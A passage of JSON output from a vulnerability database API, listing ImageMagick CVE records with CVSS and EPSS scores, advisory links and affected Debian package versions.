"VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-10251" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yhmq-s1jh-17bh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49499?format=api", "vulnerability_id": "VCID-yspe-wj34-juck", "summary": "Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-32545.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-32545.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-32545", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.2846", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28502", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28293", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28358", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28401", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28405", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28362", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28304", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28315", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28294", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28248", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00104", "scoring_system": "epss", "scoring_elements": "0.28152", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-32545" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32545", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32545" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016442", "reference_id": "1016442", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016442" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091811", "reference_id": "2091811", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2091811" }, { "reference_url": "https://security.gentoo.org/glsa/202405-02", "reference_id": "GLSA-202405-02", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202405-02" }, { "reference_url": "https://usn.ubuntu.com/5534-1/", "reference_id": "USN-5534-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5534-1/" }, { "reference_url": "https://usn.ubuntu.com/5736-1/", "reference_id": "USN-5736-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5736-1/" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" }, { "reference_url": "https://usn.ubuntu.com/USN-5736-2/", "reference_id": "USN-USN-5736-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5736-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2022-32545" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yspe-wj34-juck" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82055?format=api", "vulnerability_id": "VCID-ytpg-f9mm-sbev", "summary": "ImageMagick: memory leak in magick/xwindow.c", "references": [ { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html" }, { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html" }, { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-16708.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-16708.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41284", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41194", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41365", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41409", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41306", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41376", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41405", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41332", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41383", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.4139", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41411", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00194", "scoring_system": "epss", "scoring_elements": "0.41379", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/issues/1531", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/issues/1531" }, { "reference_url": "https://www.debian.org/security/2020/dsa-4712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1801665", "reference_id": "1801665", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1801665" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-35:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-35:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:7.0.8-35:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16708", "reference_id": "CVE-2019-16708", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:M/Au:N/C:N/I:N/A:P" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16708" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": 